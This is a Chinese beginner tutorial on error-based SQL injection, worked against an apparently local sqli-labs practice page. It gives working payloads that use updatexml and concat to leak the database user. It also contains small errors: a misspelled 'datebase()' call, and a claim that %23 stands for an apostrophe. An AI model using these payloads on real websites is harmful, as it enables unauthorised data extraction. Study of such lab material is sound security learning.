时间:2021-05-23
首先可能大家都会问什么是sql?
Sql是数据库的一种类型,是用来存储网站数据的。
每当我们点开一个网站,就会从网站的数据库中获取相关的内容。
我们来梳理一下访问网页的简图:
看完这个以后,我们发现一个问题,当我们对发送数据这块动足够脑筋的时候,只要输入合理是可以做很多事情的,我们可以利用其方式获取很多内容。
接下来我们来讲解一下“ ' ”这个符号在sql中的运用
首先' 在sql中闭合一句话结束,如果这句话用的是 ' 来闭合,那么我们人为的加入 ' 是不是可以在后面接新的语句了呀?接新的句子就可以做自己想要做的事情了。
当然,如果大家想要真的理解还是要多学学sql和asp等语言。
接下来我们来开始演示吧~
接下来步入正轨,进入域名以后,我们会发现网站是要我们输入id的,所以在这里按照sql的要求输入
http://localhost/sqli/Less-1/?id=1
这里的?Id=1是数据库的进入的格式,想要回去对应的数据变数字就行了。
http://localhost/sqli/Less-1/?id=2
接着变换id,我们发现有多个账户密码,这些都是这个网站对应的数据库里面的内容。也是数据库里面对应的路径。
接下来就是重点了,当我们在http://localhost/sqli/Less-1/?id=1后面加入 ' 时候,我们来看一下
我们发现这个网站出现了报错,并且出现了错误信息的一个反馈
''1'' LIMIT 0,1'
这是由于我们加入 ' 引起的,我们来看一下这个报错语句,分析一下它,去掉最外层的 ‘' 得到 '1'' LIMIT 0,1 我们发现这个数据库有限制,输出只能是一行。
因为我们加入了'闭合了语句,那么结合后面的内容,我们可以在'后面补充一些句子来得到更多的内容,在这里我想获取数据库用户名,一般默认user
http://localhost/sqli/Less-1/?id=1'and updatexml(1,concat(0x7e,user()),0)%23
%23就是'的意思。 是#url编码之后的值,因为sql语句在进入数据查询的时候会进行一次url解码,所以这个地方必须是url编码之后的值
这里我们看到出现了
~root@localhost
也就是数据库的用户名是 root
接下来我要查询数据库名称
http://localhost/sqli/Less-1/?id=1' and updatexml(1,concat(0x7e,datebase()),0)%23
这里因为我把数据库文件名字改了所以没有查出来,当然,如果你知道的够多,这里还有很多种做法,这里的datebase的名字是可以猜解出来的。
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持。
声明:本页内容来源网络,仅供用户参考;我单位不保证亦不表示资料全面及准确无误,也不保证亦不表示这些资料为最新信息,如因任何原因,本网内容或者用户因倚赖本网内容造成任何损失或损害,我单位将不会负任何法律责任。如涉及版权问题,请提交至online#300.cn邮箱联系删除。
例如:SQL注入攻击XSS攻击复制代码代码如下:任意执行代码文件包含以及CSRF.}关于SQL攻击有很多文章还有各种防注入脚本,但是都不能解决SQL注入的根本问
SQL注入攻击的总体思路:发现SQL注入位置;判断服务器类型和后台数据库类型;确定可执行情况对于有些攻击者而言,一般会采取sql注入法。下面我也谈一下自己关于s
第一个 简要描述:由于变量过滤不严产生SQL注入漏洞可通过入侵手段拿到站点权限 详细说明:http://labs.duba.net/kws/feedba
sql注入入门SQL注入是一类危害极大的攻击形式。虽然危害很大,但是防御却远远没有XSS那么困难。SQL注入漏洞存在的原因,就是拼接SQL参数。也就是将用于输入
1、SQL注入攻击的本质:让客户端传递过去的字符串变成SQL语句,而且能够被执行。2、每个程序员都必须肩负起防止SQL注入攻击的责任。 说起防止SQL注入攻击